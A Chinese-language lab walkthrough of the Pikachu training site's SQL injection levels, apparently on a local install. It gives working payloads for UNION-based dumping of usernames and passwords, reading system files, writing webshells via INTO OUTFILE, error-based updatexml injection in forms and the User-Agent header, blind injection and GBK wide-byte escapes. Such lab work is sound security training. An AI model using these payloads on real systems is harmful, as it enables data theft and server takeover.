SQL注入漏洞主要形成的原因是在数据交互中，前端的数据传入到后台处理时，没有做严格的判断，导致其传入的“数据”拼接到SQL语句中后，被当作SQL语句的一部分执行。 从而导致数据库受损（被脱裤、被删除、甚至整个服务器权限沦陷）。

注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中，再在后台 Sql 服务器上解析执行进行的攻击

Sql 注入产生原因：

当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求，如果权限验证通过就会执行 Sql 语句。 这种网站内部直接发送的Sql请求一般不会有危险，但实际情况是很多时候需要结合用户的输入数据动态构造 Sql 语句，如果用户输入的数据被构造成恶意 Sql 代码，Web 应用又未对动态构造的 Sql 语句使用的参数进行审查，则会带来意想不到的危险。

Sql 注入带来的威胁主要有如下几点：

猜解后台数据库，这是利用最多的方式，盗取网站的敏感信息。 绕过认证，列如绕过验证登录网站后台。 注入可以借助数据库的存储过程进行提权等操作

在构建代码时，一般会从如下几个方面的策略来防止SQL注入漏洞： 1.对传进SQL语句里面的变量进行过滤，不允许危险字符传入； 2.使用参数化（Parameterized Query 或 Parameterized Statement）； 3.还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!

看题目，我们先选择查询id为1的用户

我们查看上方url，发现没有传参，说明其实post类型

这种时刻就该把bp请出来了，我们进行抓包

果然是post传参，将其发送到Repeater

找列数：id=1 order by n# &submit=%E6%9F%A5%E8%AF%A2，n为猜测的列数，如果猜测的列数大于select语句查询的结果的列数，会返回报错

比如，n为5时，就会报错。经过测试，列数为2

爆库：id=1 union select database(),2# &submit=%E6%9F%A5%E8%AF%A2

爆表：id=1 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2

爆列：id=1 union select group_concat(column_name),2 from information_schema.columns where  table_name='users' and table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2

爆数据：id=1 union select username,password from users# &submit=%E6%9F%A5%E8%AF%A2

读文件 ：id=1 union select load_file('C:/Windows/win.ini'),1 from users#&submit=%E6%9F%A5%E8%AF%A2

写马：id=1 union select 1,'' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/1.php'#&submit=%E6%9F%A5%E8%AF%A2

这里就不一一演示了嘿嘿

然后我们猜测sql语句为

select 字段1，字段2 from 表名 where id=1

我们再试试id=1 or 1=1&submit=%E6%9F%A5%E8%AF%A2，将其改为

select 字段1，字段2 from 表名 where id=1 or 1=1

上面其他语句也是同样的原理

在id=1后加上or 1=1试试

由此将所有用户信息显示出来！ 

看题目，我们输入kobe 

看上面url有显示，开始进行sql注入步骤：

查看源码，要用'来闭合

找列数：http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' order by n%23&submit=%E6%9F%A5%E8%AF%A2

n为猜测的列数，payload中的%23就是#，由于在url中#有特殊含义所以要转义，前面的ip和路径根据自己搭建皮卡丘时的路径而定

原理和上一关一样，如果猜测的列数小于等于select语句查询结果的列数，会返回本关开始那张图，如果猜测的列数大于select语句查询结果的列数，会返回报错。

如，我们访问http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' order by 5%23&submit=%E6%9F%A5%E8%AF%A2，就会报错

​

最终发现查询结果列数为2

爆库：http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,database()%23&submit=%E6%9F%A5%E8%AF%A2

爆表：http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()%23&submit=%E6%9F%A5%E8%AF%A2

爆列：http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'%23&submit=%E6%9F%A5%E8%AF%A2

爆数据：http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select username,password from users%23&submit=%E6%9F%A5%E8%AF%A2

读文件：http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,load_file('C:/Windows/win.ini')%23&submit=%E6%9F%A5%E8%AF%A2

写马：http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,'' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/2.php'%23&submit=%E6%9F%A5%E8%AF%A2

这里还是不演示了，就是这么个道理！

我们同样猜测此sql语句为：

select 字段1，字段2 from 表名 where username = 'kobe';

同样将它改为（用一个单引号将前面的单引号闭合）：

select 字段1，字段2 from 表名 where username = 'kobe' or 1=1#';

输入：kobe' or 1=1#试试

同样将所有用户的信息显示出来！

看题目说可以输入名字的一部分

我们只输个“k”，网页返回所有带k的，且上面同样有url显示 

所以一些sql注入语句（找列数、爆库、爆表啥的），还是老套路

查看源码，这次用%'来闭合 

找列数：http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' order by n%23&submit=%E6%90%9C%E7%B4%A2

n仍为猜测的列数，同样，payload中的%23就是#，由于在url中#有特殊含义所以要转义，前面的ip和路径还是根据自己搭建皮卡丘时的路径而定

本次发现查询结果列数为3

爆库：http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select database(),2,3%23&submit=%E6%90%9C%E7%B4%A2

爆表：http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()%23&submit=%E6%90%9C%E7%B4%A2

爆列：http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'%23&submit=%E6%90%9C%E7%B4%A2

爆数据：http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select username,password,level from users%23&submit=%E6%90%9C%E7%B4%A2

读文件：http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select 1,2,load_file('C:/Windows/win.ini')%23&submit=%E6%90%9C%E7%B4%A2

写马：http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select 1,2,'' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/3.php'%23&submit=%E6%90%9C%E7%B4%A2

这此猜测sql语句为：

select from 表名 where username like ' %k% ';

%代表没有或有多个字符，所以可对含有k的用户进行查询，我们再在改为（用%'来闭合）：

select from 表名 where username like ' %k% ' or 1=1 #%';

输入k% ' or 1=1 #

所有用户的信息显示出来！

老样子老样子，输入kobe，发现上面同样有url显示

我们仍需考虑是什么闭合，查看源码发现相较于字符型注入，多了括号，所以这次用')来闭合

​

找列数：http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') order by n%23&submit=%E6%9F%A5%E8%AF%A2

n：猜测的列数，说了无数遍了嗷！

爆库：http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select database(),2%23&submit=%E6%9F%A5%E8%AF%A2

爆表：http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select group_concat(distinct table_name),2 from information_schema.columns where table_schema='pikachu'%23&submit=%E6%9F%A5%E8%AF%A2

爆列：http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select group_concat(column_name),2 from information_schema.columns where table_name=0x7573657273%23&submit=%E6%9F%A5%E8%AF%A2

爆内容：http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select username,password from users%23&submit=%E6%9F%A5%E8%AF%A2

读文件：http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select 1, load_file('c:/windows/win.ini')%23&submit=%E6%9F%A5%E8%AF%A2

写马：http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select 1,'' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/4.php'%23&submit=%E6%9F%A5%E8%AF%A2

我们再输入') or 1=1#，同样是用')来闭合

所有用户信息！

本关没有给出账号密码提示，我们点击注册

填好信息后，用bp抓包。从抓包结果看是post型的，除了submit之外有6个参数。

先是update注入，因为你得先注册才能修改信息吧

那就还得先了解一下updatexml()函数的用法：

语法：updatexml(xml document, XPathing, new_value)

第一个参数：XML_document是String格式，为XML文档对象的名称，也就是表中的字段名

第二个参数：XPath_string (Xpath格式的字符串)

第三个参数：new_value，String格式，替换查找到的符合条件的数据

那么怎么破解呢？跟上几关的思路不一样，本关是写一个报错注入，再报错回显时将我们想要得信息显示出来

回到注册界面，在用户栏写如下代码（注意闭合）：

' or updatexml(1, concat(0x7e, database()), 0) or '

密码那些随便写，提交后得到以下界面

看起来是个报错，其实已经回显了数据库名

同理可以把database()改为其他函数来获得更多数据库信息

insert注入

我们注册好一个用户666并登录

点击修改个人信息，再在性别一栏输入刚才的代码：

' or updatexml(1, concat(0x7e, database()), 0) or '

提交后同样得到了数据库名

其他的爆表爆列啥的，就不写了哈

随便输入一条留言666

再点击删除，同时用bp抓包，发现其是GET传参

send to repeater

之后在id=后输入如下代码将其闭合

1 or updatexml(1, concat(0x7e, database()), 0)

再将此段代码转换为特殊字符的url编码

改完后就是这个样子

最后send，就得到了数据库名（和上题一样，还是以报错的形式）

首先来了解一下什么是"http header"注入

有些时候，后台开发人员为了验证客户端头信息（比如常用的cookie验证）, 或者通过http header头信息获取客户端的一些资料，比如useragent、accept字段等，会对客户端的http header信息进行获取并使用SQL进行处理， 如果此时没有足够的安全考虑则可能会导致基于http header的SQL注入漏洞。

接下来看题目，按提示，我们用admin登录

刷新一下并用bp抓包

可以发现由上文提到的user agent 

send to Repeater后，再修改user agent ，如下

' or updatexml(1,concat(0x7e, database()), 0) or '

最后send，成功得到数据库名（仍以报错的方式） 

首先了解下盲注的概念

（1）盲注就是在sql注入过程中，sql语句执行select之后，可能由于网站代码的限制或者apache等解析器配置了不回显数据，造成在select数据之后不能回显到前端页面。此时，我们需要利用一些方法进行判断或者尝试，这个判断的过程称之为盲注。

通俗的讲就是在前端页面没有显示位，不能返回sql语句执行错误的信息，输入正确和错误返回的信息都是一致的，这时候我们就需要使用页面的正常与不正常显示来进行sql注入。

（2）盲注又分为布尔类型和时间类型

什么情况下使用布尔类型的盲注？

**没有返回SQL执行的错误信息

**错误与正确的输入，返回的结果只有两种

什么情况下使用时间类型的盲注？

**页面上没有显示位和SQL语句执行的错误信息，正确执行和错误执行的返回界面一样，此时需要使用时间类型的盲注。

时间型盲注与布尔型盲注的语句构造过程类似，通常在布尔型盲注表达式的基础上使用IF语句加入延时语句来构造，由于时间型盲注耗时较大，通常利用脚本工具来执行，在手工利用的过程中较少使用。

接下来看题，本题为布尔类型

我们输入kobe' or 1=1#

再试试kobe' or 1=2#

可见，只有我们输入的条件为真时，才能输出正确信息

这次我们输入kobe' and length(database())=1#，显示您输入的username不存在.......

再把1换成2，以此类推，发现=7的时候，输出了正确信息

那么，我们就知道了数据库长度为7，同理，更换其他函数来测试其他数据

本题就是基于时间类型的盲注了，题目不告诉你了嘛

上面说了，此种类型适用于无论输入是否正确，都返回相同数据，我们无法判断自己输入的条件是否为真，所以在后面加了一个时间限制

先向上题那样，输入kobe' and length(database())=7#

试试其他语句，我们发现 ，无论输入什么，回显的都是这句话

所以，我们这时就可以使用时间盲注了

输入kobe' and if(length(database())=7, sleep(1),5)#

意思为：若length(database())=7正确，延迟1秒返回：若不正确，延迟5秒返回

我们去测试，发现返回的虽然都是那句I don't care who you are!

但条件正确和不正确的回显时间不同，以此来判断哪个是正确条件

还是先了解一下宽字节的原理

先了解一下什么是窄、宽字节已经常见宽字节编码：

**当某字符的大小为一个字节时，称其字符为窄字节.

**当某字符的大小为两个字节时，称其字符为宽字节.

**所有英文默认占一个字节，汉字占两个字节

**常见的宽字节编码：GB2312,GBK,GB18030,BIG5,Shift_JIS等

宽字节注入指的是 mysql 数据库在使用宽字节（GBK）编码时，会认为两个字符是一个汉字（前一个ascii码要大于128（比如%df），才到汉字的范围），而且当我们输入单引号时，mysql会调用转义函数，将单引号变为’，其中\的十六进制是%5c,mysql的GBK编码，会认为%df%5c是一个宽字节，也就是’運’，从而使单引号闭合（逃逸），进行注入攻击。

接下来看题，我们随便输入一个用户123，用bp抓包发现其是post类型的

再send to Repeater

然后将name修改为如下代码（注意f后面有个单引号）

1%df' union select 1,2#

最后send一下，成功得到我们想要的信息！

终于写完了啊啊啊啊！